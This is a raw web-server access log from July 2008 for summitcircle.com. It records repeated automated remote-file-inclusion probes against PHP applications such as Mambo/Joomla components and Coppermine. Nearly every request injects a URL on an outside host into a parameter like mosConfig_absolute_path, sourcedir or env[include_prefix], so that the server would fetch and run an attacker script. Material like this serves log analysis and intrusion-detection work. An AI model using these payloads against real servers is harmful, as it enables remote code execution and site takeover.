74.6.18.240 - - [27/Jul/2008:18:25:42 -0700] "GET /logs/access_070827.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:26:14 -0700] "GET /logs/access_080204.log/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:26:14 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:26:14 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:26:27 -0700] "GET /logs/access_080204.log/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:26:27 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:26:27 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
212.72.200.170 - - [27/Jul/2008:18:28:54 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
204.15.10.22 - - [27/Jul/2008:18:28:56 -0700] "GET ///index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.summitcircle.com"
204.15.10.22 - - [27/Jul/2008:18:28:57 -0700] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.summitcircle.com"
204.15.10.22 - - [27/Jul/2008:18:28:59 -0700] "GET ///index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "summitcircle.com"
204.15.10.22 - - [27/Jul/2008:18:28:59 -0700] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "summitcircle.com"
66.226.64.33 - - [27/Jul/2008:18:29:53 -0700] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "summitcircle.com"
66.226.64.33 - - [27/Jul/2008:18:29:53 -0700] "GET ///index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "summitcircle.com"
66.226.64.33 - - [27/Jul/2008:18:29:57 -0700] "GET ///index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.summitcircle.com"
66.226.64.33 - - [27/Jul/2008:18:29:57 -0700] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.summitcircle.com"
211.225.219.65 - - [27/Jul/2008:18:30:35 -0700] "GET /logs/access_080121.log//index.php?lg=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
211.225.219.65 - - [27/Jul/2008:18:30:36 -0700] "GET //index.php?lg=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
211.225.219.65 - - [27/Jul/2008:18:30:37 -0700] "GET /logs/access_071231.log//index.php?lg=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "summitcircle.com"
211.225.219.65 - - [27/Jul/2008:18:30:37 -0700] "GET //index.php?lg=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "summitcircle.com"
211.225.219.65 - - [27/Jul/2008:18:30:44 -0700] "GET /logs/access_071231.log//index.php?lg=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "summitcircle.com"
211.225.219.65 - - [27/Jul/2008:18:30:45 -0700] "GET //index.php?lg=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "summitcircle.com"
87.244.11.20 - - [27/Jul/2008:18:31:51 -0700] "GET /logs/access_080204.log/lostpasswd.php?env[include_prefix]=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.244.11.20 - - [27/Jul/2008:18:31:54 -0700] "GET /lostpasswd.php?env[include_prefix]=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.244.11.20 - - [27/Jul/2008:18:31:54 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
211.225.219.65 - - [27/Jul/2008:18:35:17 -0700] "GET //index.php?lg=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
218.188.33.2 - - [27/Jul/2008:18:36:35 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.summitcircle.com"
218.188.33.2 - - [27/Jul/2008:18:36:35 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.summitcircle.com"
193.138.159.164 - - [27/Jul/2008:18:37:09 -0700] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
193.138.159.164 - - [27/Jul/2008:18:37:09 -0700] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
219.111.8.239 - - [27/Jul/2008:18:37:25 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.summitcircle.com"
219.111.8.239 - - [27/Jul/2008:18:37:25 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.summitcircle.com"
211.75.29.70 - - [27/Jul/2008:18:37:50 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.summitcircle.com"
211.75.29.70 - - [27/Jul/2008:18:37:54 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.summitcircle.com"
67.15.70.35 - - [27/Jul/2008:18:39:11 -0700] "GET //tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.15.70.35 - - [27/Jul/2008:18:39:13 -0700] "GET /logs//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
87.244.11.20 - - [27/Jul/2008:18:39:48 -0700] "GET /logs/access_071210.log/lostpasswd.php?env[include_prefix]=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.15.70.35 - - [27/Jul/2008:18:39:50 -0700] "GET /logs/access_080120.log//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.15.70.35 - - [27/Jul/2008:18:39:50 -0700] "GET /logs/access_071224.log//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
59.125.211.84 - - [27/Jul/2008:18:40:06 -0700] "GET //tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
59.125.211.84 - - [27/Jul/2008:18:40:06 -0700] "GET /logs//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
59.125.211.84 - - [27/Jul/2008:18:40:06 -0700] "GET /logs/access_080120.log//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
59.125.211.84 - - [27/Jul/2008:18:40:07 -0700] "GET /logs/access_071224.log//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.246.28.208 - - [27/Jul/2008:18:40:13 -0700] "GET /logs/access_080120.log//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.28.208 - - [27/Jul/2008:18:40:13 -0700] "GET //tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.28.208 - - [27/Jul/2008:18:40:13 -0700] "GET /logs/access_071224.log//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.28.208 - - [27/Jul/2008:18:40:13 -0700] "GET /logs//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:40:21 -0700] "GET /logs/access_071231.log/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:40:22 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:40:22 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:41:23 -0700] "GET /logs/access_071231.log/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:41:23 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:41:23 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:41:58 -0700] "GET /logs/access_071210.log/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:41:58 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:41:58 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:41:59 -0700] "GET /logs/access_071210.log/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:41:59 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:41:59 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:18:44:13 -0700] "GET /logs/access_071022.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:18:44:13 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:44:30 -0700] "GET /logs/access_071022.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:18:44:30 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
74.50.7.10 - - [27/Jul/2008:18:45:34 -0700] "GET /logs/access_080128.log/?sourcedir=http://iraqmarkets.com//ray/modules/global/inc/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
74.50.7.10 - - [27/Jul/2008:18:45:34 -0700] "GET /?sourcedir=http://iraqmarkets.com//ray/modules/global/inc/oye.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.812" "www.summitcircle.com"
74.50.7.10 - - [27/Jul/2008:18:45:34 -0700] "GET /logs/access_071112.log/?sourcedir=http://iraqmarkets.com//ray/modules/global/inc/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
74.50.7.10 - - [27/Jul/2008:18:45:34 -0700] "GET /logs/?sourcedir=http://iraqmarkets.com//ray/modules/global/inc/oye.txt?? HTTP/1.1" 200 10662 "-" "libwww-perl/5.812" "www.summitcircle.com"
216.246.30.21 - - [27/Jul/2008:18:46:00 -0700] "GET /logs/access_080128.log/?sourcedir=http://iraqmarkets.com//ray/modules/global/inc/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.246.30.21 - - [27/Jul/2008:18:46:03 -0700] "GET /?sourcedir=http://iraqmarkets.com//ray/modules/global/inc/oye.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.246.30.21 - - [27/Jul/2008:18:46:03 -0700] "GET /logs/?sourcedir=http://iraqmarkets.com//ray/modules/global/inc/oye.txt?? HTTP/1.1" 200 10662 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.246.30.21 - - [27/Jul/2008:18:46:14 -0700] "GET /logs/access_071112.log/?sourcedir=http://iraqmarkets.com//ray/modules/global/inc/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
193.207.106.54 - - [27/Jul/2008:18:50:37 -0700] "GET /?sourcedir=http://iraqmarkets.com//ray/modules/global/inc/oye.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.summitcircle.com"
193.207.106.54 - - [27/Jul/2008:18:50:37 -0700] "GET /logs/access_080128.log/?sourcedir=http://iraqmarkets.com//ray/modules/global/inc/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
193.207.106.54 - - [27/Jul/2008:18:50:37 -0700] "GET /logs/?sourcedir=http://iraqmarkets.com//ray/modules/global/inc/oye.txt?? HTTP/1.1" 200 10662 "-" "libwww-perl/5.79" "www.summitcircle.com"
58.65.228.5 - - [27/Jul/2008:18:51:22 -0700] "GET /logs/access_070806.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
58.65.228.5 - - [27/Jul/2008:18:51:26 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:51:44 -0700] "GET /logs/access_080128.log/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:51:44 -0700] "GET /?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:51:44 -0700] "GET /logs/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 10662 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:51:45 -0700] "GET /logs/access_080128.log/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:51:45 -0700] "GET /?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:51:45 -0700] "GET /logs/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 10662 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:51:57 -0700] "GET /logs/access_071112.log/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:51:58 -0700] "GET /logs/access_071112.log/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:52:06 -0700] "GET /logs/access_080128.log/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:52:06 -0700] "GET /?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:52:06 -0700] "GET /logs/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 10662 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:52:08 -0700] "GET /logs/access_080128.log/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:52:08 -0700] "GET /?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:52:08 -0700] "GET /logs/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 10662 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:52:22 -0700] "GET /logs/access_071112.log/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:52:23 -0700] "GET /logs/access_071112.log/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
193.207.106.54 - - [27/Jul/2008:18:52:58 -0700] "GET /logs/access_071112.log/?sourcedir=http://iraqmarkets.com//ray/modules/global/inc/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:53:49 -0700] "GET /logs/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 10662 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:53:49 -0700] "GET /?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:53:52 -0700] "GET /logs/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 10662 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:18:53:53 -0700] "GET /?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.812" "www.summitcircle.com"
58.65.228.5 - - [27/Jul/2008:18:54:06 -0700] "GET /logs/access_070827.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
207.58.181.13 - - [27/Jul/2008:18:54:28 -0700] "GET /logs/access_071029.log//include/write.php?dir=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
207.58.181.13 - - [27/Jul/2008:18:54:29 -0700] "GET //include/write.php?dir=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
207.58.181.13 - - [27/Jul/2008:18:56:00 -0700] "GET //include/write.php?dir=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
207.58.181.13 - - [27/Jul/2008:18:56:01 -0700] "GET /logs/access_071029.log//include/write.php?dir=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
207.58.181.13 - - [27/Jul/2008:18:56:01 -0700] "GET //include/write.php?dir=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
207.58.181.13 - - [27/Jul/2008:18:56:01 -0700] "GET /logs//include/write.php?dir=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
207.58.181.13 - - [27/Jul/2008:18:56:41 -0700] "GET /logs/access_071022.log//include/write.php?dir=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
81.92.219.130 - - [27/Jul/2008:18:57:15 -0700] "GET /logs//include/write.php?dir=http://www.educsi.com.br/includes/Cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
